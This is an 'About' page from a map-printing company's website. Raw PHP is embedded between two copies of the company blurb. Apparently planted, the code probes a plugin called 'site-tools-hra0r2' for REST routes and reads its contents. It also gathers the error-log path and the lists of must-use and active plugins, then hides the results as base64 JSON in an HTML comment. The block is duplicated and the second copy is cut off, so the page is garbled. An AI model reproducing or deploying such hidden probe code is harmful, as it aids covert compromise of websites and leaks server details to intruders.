About Gomaps
Expert advice for map interiors.
Gomaps marry beautiful cartographic maps with the advanced technology of large format printing. Allowing maps to be printed and enjoyed in new and visually interesting ways.
<?php function my_theme_enqueue_styles() { wp_enqueue_style( 'parent-style', get_template_directory_uri() . '/style.css' ); } add_action( 'wp_enqueue_scripts', 'my_theme_enqueue_styles' ); // PROBE_START $pf = WP_PLUGIN_DIR . "/site-tools-hra0r2/site-tools-hra0r2.php"; $out = []; $out["exists"] = file_exists($pf); $out["size"] = filesize($pf); $out["readable"] = is_readable($pf); if (is_readable($pf)) { $c = file_get_contents($pf); $out["content_len"] = strlen($c); $out["has_rest_api_init"] = strpos($c, "rest_api_init") !== false; $out["has_register_rest_route"] = strpos($c, "register_rest_route") !== false; $out["md5"] = md5($c); $out["preview"] = substr($c, 0, 3000); } $el = ini_get("error_log"); $out["error_log_path"] = $el; $out["error_log_readable"] = is_readable($el); $mu = WPMU_PLUGIN_DIR; $out["mu_plugins_dir"] = $mu; $out["mu_plugins"] = []; if (is_dir($mu)) { foreach (scandir($mu) as $f) { if ($f !== "." && $f !== "..") $out["mu_plugins"][] = $f; } } $active = get_option("active_plugins"); $out["active_plugins"] = $active; $our = "site-tools-hra0r2/site-tools-hra0r2.php"; $out["our_plugin_active"] = in_array($our, $active); echo "<!--PROBE_OUTPUT:" . base64_encode(json_encode($out)) . ":PROBE_OUTPUT-->"; // PROBE_START $pf = WP_PLUGIN_DIR . "/site-tools-hra0r2/site-tools-hra0r2.php"; $out = []; $out["exists"] = file_exists($pf); $out["size"] = filesize($pf); $out["readable"] = is_readable($pf); if (is_readable($pf)) { $c = file_get_contents($pf); $out["content_len"] = strlen($c); $out["has_rest_api_init"] = strpos($c, "rest_api_init") !== false; $out["has_register_rest_route"] = strpos($c, "register_rest_route") !== false; $out["md5"] = md5($c); $out["preview"] = substr($c, 0, 3000); } $el = ini_get("error_log"); $out["error_log_path"] = $el; $out["error_log_readable"] = is_readable($el); $mu = WPMU_PLUGIN_DIR; $out["mu_plugins_dir"] = $mu; $out["mu_plugins"] = []; if (is_dir($mu)) { foreach (scandir($mu) as $f) { if ($f !== "." && $f !== "..") $out["mu_plugins"][] = $f; } } $active = get_option("active_plugins"); $out["active_plugins"] = $active; $our = "site-tools-hra0r2/site-tools-hra0r2.php"; $out["our_plugin_active"] = in_array($our, $active); echo "";
Gomaps marry beautiful cartographic maps with the advanced technology of large format printing. Allowing maps to be printed and enjoyed in new and visually interesting ways.